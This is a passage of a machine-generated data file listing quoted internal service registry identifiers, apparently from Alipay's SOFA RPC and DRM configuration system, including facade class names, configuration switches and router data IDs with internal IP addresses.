DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.csbizcenter.facade.AppExpressFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.tradeexprod:name=com.alipay.guardian.client.sofa.drm.GuardianDrm.checkMvelBlackKeyWords,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.finpwm:name=com.alipay.finpwm.biz.cpm.drm.CpmSwitchControlDRMResource.sfStableSwitchPercent,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.tss.coopr.common.service.facade.pkg.PackageQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zcbmarketcenter:name=com.alipay.antvip.client.internal.drm.DrmControl.allAvailable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.opscloudcore.framework.core.facade.OpscloudClientSyncServiceFacade:1.0:antbuservice@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.178.5#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_100.83.217.229#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.riskmodelpredict.common.service.facade.abgroup.AbGroupRpcService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.revol.core.service.facade.ScriptChecker:1.0:cone_login@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.185.93#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.zdaljdbc:name=com.alipay.zdal.monitor.drm.cfmng.cfmng_ds.slowSql,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.124.186.48#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.paymentmng:name=com.alipay.cif.model.cache.CifCOControlSwitch.l2WriteCustProp,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.promokernel.common.biz.facade.api.TeamRelationOperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.iopencore.common.service.manager.LimitConfigDTOManager:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cdp.common.service.facade.space.trigger.BadgeTriggerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.identifycore.common.service.manage.api.SystemNameFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.lifemng:name=com.alipay.cif.utils.probe.ProbeDrmSwitch.reportEnabled,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.graymng.common.service.facade.api.GrayTraasFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.alideviceinfo.biz.rpc.facade.innovate.MerchantCircleFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfoprod.common.service.cds.facade.ProductThresholdFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cschannel.common.service.facade.api.prod.mng.ProdCommonContentService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pvsofabootserver.facade.PvSofabootService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.inshealthclaimmng.workorder.facade.InvestAppealWorkOrderFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaljdbc:name=com.alipay.zdal.monitor.drm.keplerweb.keplerui_ds.slowSql,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.tradeexprod:name=com.alipay.routeclient.DefaultRouteCoordinator.idcDomainSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_100.83.242.89#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_30.50.117.182#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.scheduler.common.service.facade.update.TaskManageFacade:1.0:ANTINS@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditmng.common.service.SceneActionMappingFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.nodejs.ConsumerService:1.0:proxymock-demo@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.baoxianprod.tripcoupon.facade.BikeCouponFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fporgassetnet.common.service.facade.api.SimulateAstPoolFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dmeta.facade.norm.MetaDataNormFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:finslip@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finbaservice.common.service.facade.analyze.api.AnalyzeReportFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaljdbc:name=com.alipay.zdal.monitor.drm.riskmng.pmcShineDataSource.slowSql,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.securitydata.common.service.facade.basicnamecontrol.BasicNameControlManagerClient:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.crmhome.common.service.facade.api.user.UserCodeQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:ipsponsorprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paycore.service.payment.api.InstantPaymentService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fincontract.common.service.facade.ContractQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zdataquery.common.service.facade.FinTntcomposeDbQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acnotifycore.common.service.facade.PostBpmsFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.channelrouter.management.facade.RuleFastConfigService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.ifundprod.common.service.facade.api.ForeignExchangeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdalhbase:name=com.alipay.zdal.ldc.hbase.mobilechat.update,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.zqueue.server.bkclfsTradeQueue#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.pcreditmarket.service.PcreditMarketViewMarkFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insmobile:name=com.alipay.insmobile.drm.insmobiledrmhandler.queryRule,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.certifymng:name=com.alipay.zoneclient.internal.DynamicLdcSwitchResource.ldcTimeDelayed,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.securitydata:name=com.alipay.securitydata.common.service.indicator.IndicatorPreCalculateResource.useModel,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.securitycap:name=com.alipay.cif.drm.PasswordRevokeSwitch.paymentPasswordRevoked,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.antcloud.acbillingcore.common.service.facade.invoice.InvoiceNewFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cif.facade.CustomizationService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zcache:name=com.alipay.zdal.ldc.tair.finfocoreRzoneTair_dest.tbaseClientWarmup,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.gfas:name=com.alipay.zdatacontext.common.agent.drm.UniformAssertClientDRM.testDrMode,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.alipay.pcinstmng.integration.instasset.InstAssetQueryClient:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.ebillcenter.common.service.facade.EbillUserProfileFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.arcore.common.service.facade.ArCheckStdFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.client.SystemAppInvokeService:1.0:unitradeadapter@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.lendpofprod:name=com.alipay.lendpofprod.biz.shared.common.schedule.thread.LoanApplyCmdLoadTest.corePoolSize,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.holoxmng.complain.service.facade.ReportSceneConfigService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:morderprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.bkinfocenter:name=com.alipay.zoneclient.internal.DynamicLdcSwitchResource.cityVipSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.revcore:name=com.alipay.revcore.common.drm.FinacDrmData.companyConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.darwin.common.service.facade.api.ReportFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbtmp.common.service.facade.TrafficCdpModuleConfManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ordermng.common.service.api.order.SpreadUrlService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:fccustmng_orgMemberModifyAuditCallBack@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrmcore.common.service.facade.service.security.verity.MdpModelRepaireSolutionService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.creativecenter.openapi.type:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finopencore.common.service.point.facade.PointQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.mif.common.service.facade.category.RelQualicationMccQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insapportion.common.service.facade.PublicityClaimFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:promocenter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.instdispute.biz.service.process.FinnetReceiveServiceProcessor:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.findatacanal.common.service.manage.gildata.StockCompanyLogoFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.smartscene.common.facade.location.UserLocationPredictService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.etetestcore.service.api.mordercenter.MocOrderOutputService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.quotetradecore.common.service.facade.api.LinkeQualityFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.channelrouter.service.facade.ChannelQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.114.121#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.promokernel.common.service.facade.api.CampQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.promocenter:name=com.alipay.promocenter.common.drm.PromocenterBussinessParamsDrmResource.abilityAccessCheckSceneCodes,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.process.bp.engine.call.BPCall:1.0:mrchis_certifyResult@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.riskmng:name=com.alipay.cif.client.drm.TairToTbaseSwitch.shadowFullAccessToTbase,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.emccenter.common.service.facade.api.BemcDataPermissionManageFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.frdecision.common.service.facade.api.FundDiversionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.190.252#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_30.50.118.16#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.insttrade:name=com.alipay.echo.platform.core.drm.EchoRecordConfigDrm.recordSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.alipay.mobilerc.common.service.facade.data.HainaDataFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.finhinetcore.common.service.facade.recall.facade.ReturnCallOrderQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbsearch.common.service.facade.api.item.CommonItemRecommendFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.15.219.177#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.alphasec.compass.operating.facade.service.NotifyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.167.117.158#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.cloudinc:name=com.alipay.common.security.dresource.SecurityCommonDrm.totalUrlDecodeTimes,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.dwsap.common.service.facade.dsdc.SyncCheckFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.lendpofprod:name=com.alipay.slaguard.common.drm.SlaGuardConfigDrm.logLevelMap,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.openapi.common.service.client.SysAppInvokeService:1.0:kbsales@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.insiopTairCache.refresh,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.ialicore:name=com.ipay.ialicore.common.drm.TenantSwitchControl.tenantSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.pcreditprod.service.PcreditHzGoSignFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.160.177.15#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.frservcenter.facade.api.EntityFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:unitestcenter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbreservationprod.common.service.facade.reservationorder.MerchantReservationOrderQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.atd:name=com.alipay.common.security.util.dresource.SecurityCommonUtilDrm.signEnable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.insttrade:name=midas.aghanimplus.MidasLoadTestDRMControl.maxCacheSize,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.sofa.rpc.elastic.ElasticService:1.0:mobilesearch@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.dmeta.facade.businessprofile.BusinessProfileFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.iexclienttrdcenter.service.facade.api.AdviceTradeRequestFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcloanapply.common.service.facade.service.apply.ApplyQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.mif.common.service.facade.MerchantContactPersonQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:csoperationmng@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.acctransquery.common.service.facade.api.AccountInfoQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:bkpromoguard@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cloud.opscore.common.service.facade.deployment.AppResourceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fintranscore.common.service.facade.trans.FinPurchaseFacade:1.0:fundtranscore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.custinsight.common.service.facade.promote.PrizeConfigService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.irisbizprod.facade.SampleService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.alphad.common.service.facade.datamng.api.AdfDataAnalysisFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.alinp.common.service.facade.idmapping.IdMappingFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.fininfoDataTairCache.compressionThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_100.88.97.210#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","SOFA_PRC_TRANSMIT_ISECURITYCORE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securitydata.common.service.facade.RiskSelectConfigQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfocore.common.service.facade.fop.api.mng.CampaignFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditmerchant.service.facade.MerchantActiveMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.55.73.197#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mrchstm.common.service.facade.point.PointInfoQueryServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fundmng.core.service.task.ZdalSequenceRepository:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchstoreapp.shopcode.service.facade.api.ShopCodeOpenFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","HEALTHY_V2@openauth#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","com.alipay.jiuzhou.client.spi.PaasActionDispatcher:1.0:opssla-mybank@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.baoxianprod.common.facade.InsureCheckFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.almcenter.service.facade.api.activity.ActivityQueryOuterFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mcomment.common.service.facade.backmanagement.WaterMarkManagementUpdateFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Servers_TP_F_ROUTER#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.mrchiscore.rabbit.common.service.facade.RabbitAccessControlQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cfmng:name=com.alipay.common.security.dresource.SecurityCommonDrm.customJsonSuffixRegex,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.pcreditpay.amount.FreezeOrderTransferFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.rcacheTairCache_dest.zonePolicy,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.antsports.common.service.facade.LoadTestFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ecbill.common.service.asset.AssetTransferFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.framework.core.facade.OpscloudClientServiceFacade:1.0:riskmng@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.icredittrans.service.facade.api.AccountQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.clivemng.common.service.facade.api.monitor.ClvServerQueryService:1.0.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.financeprod.service.facade.UserFinanceAssetFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.rmsdeploy.common.service.facade.XpaasFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:hellf@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.fc.argo.pyxis.facade.BizArrangeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.lendpofprod:name=com.alipay.lendpofprod.biz.shared.support.drm.LoanRepayConfigDrm.acctSubSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.etetestcore.service.api.MedicalAckService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.assettrans.core.service.dailycut.api.DailyCollectTransService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.barcodeprod.common.service.facade.qrcode.PcMerchantFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promocenter.facade.api.DiscountActivityQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.antcloud.infrastructure.facade.environment.EnvironmentExplorer:1.0:SERVICEINSTANCE@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.opssla.common.service.facade.DrmManageFacade:1.0:zmopssla@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.csactive.common.service.facade.odps.OdpsServiceClient:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA-SCHEDULER-S-S-lifeprod-scheduler#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.kbservcenter.common.service.facade.ServTipFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.contentlib.common.service.facade.app.ContentAppActionCntFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ucdpmng.facade.UcdpCrowdFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.airbops:name=com.alipay.cif.drm.PasswordRevokeSwitch.simplePasswordRevoked,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.pcreditbill.facade.adjust.PcreditAdjustBillDateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_tp_s_cardinfo_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.checkroute.common.service.checkersdk.service.ChangeRiskDefenseService:1.0:zmcheck@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilechat.common.service.facade.api.ChatroomManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.bizprodmng:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.disableSync,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.opssla.common.service.facade.OpsslaPlanFacade:1.0:opssla@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fincorecheck.common.service.facade.bizcheck.AccOrderCheckFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.antcloud.dds.zdal.interfaces.endpoint.facade.rest.api.ApiAppRuleFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.finannafccore.facade.api.RankQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:codecompass@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_TP_C_INDUSTRY#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.accalogprocess.common.service.facade.ServiceGovernDataFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbsales.common.service.facade.grid.relation.GridRelationManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cloudinc:name=com.alipay.guardian.client.sofa.drm.GuardianDrm.guardianConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.tradeexprod:name=com.alipay.common.tracer.manage.TracerDrm.zdalDbDigestLogThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.customscenter:name=com.alipay.customscenter.biz.declare.drm.CommonConfig.signKeyPath,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.secdatacontext.common.facade.api.ComputationTripletService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbsettle.service.facade.common.api.query.SettleBizRecordQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.bizfundprod.common.service.facade.payment.cashierpay.AgreementPayRZoneFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Servers_TP_M_UTP#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.securityops.common.service.client.spi.SecOpsChangeCallbackService:1.0:securityemc@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zerox.common.service.facade.EventAccessFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finstore.common.service.facade.fop.bops.ShopModuleManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.96.118#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.fininfo:name=com.alipay.routeclient.DefaultRouteCoordinator.rpcRouteByGroupWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.malgo.common.facade.ExperimentConfigBatchFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secuprod.common.service.facade.api.rpc.UserBrokerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cfpcenter.emc.common.service.facade.api.EmcBusinessTransFacade:1.0:giftprod@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.opssla.common.service.facade.DrmManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.secucommunity.open.facade.OpenCommentFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.antfinancial.antchain.cloud.endpoint.facade.DataExportServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fundmng.common.service.facade.FundDetailQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.antfinancial.antchain.cloud.endpoint.facade.DataSearchFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.inscontentprod.common.service.facade.content.LiveSquareFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.finfocoreTairCache.cacheEngineUrl,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.tradeexprod:name=com.alipay.common.security.dresource.SecurityCommonDrm.refererCheckerDeny,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.antfeaturelib.common.facade.service.DataViewCalcService:1.0:publicDomain_fininsightcore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.appxprod.common.service.facade.api.theme.ThemeMngConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.caprod.service.cert.facade.CertServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mitemcenter.common.service.facade.api.query.NoteQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mfinsecu.common.service.facade.api.bigevent.EventArchiveManagerFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fundselling.facade.redeem.RedeemFacade:1.0@DEFAULT#@#DEF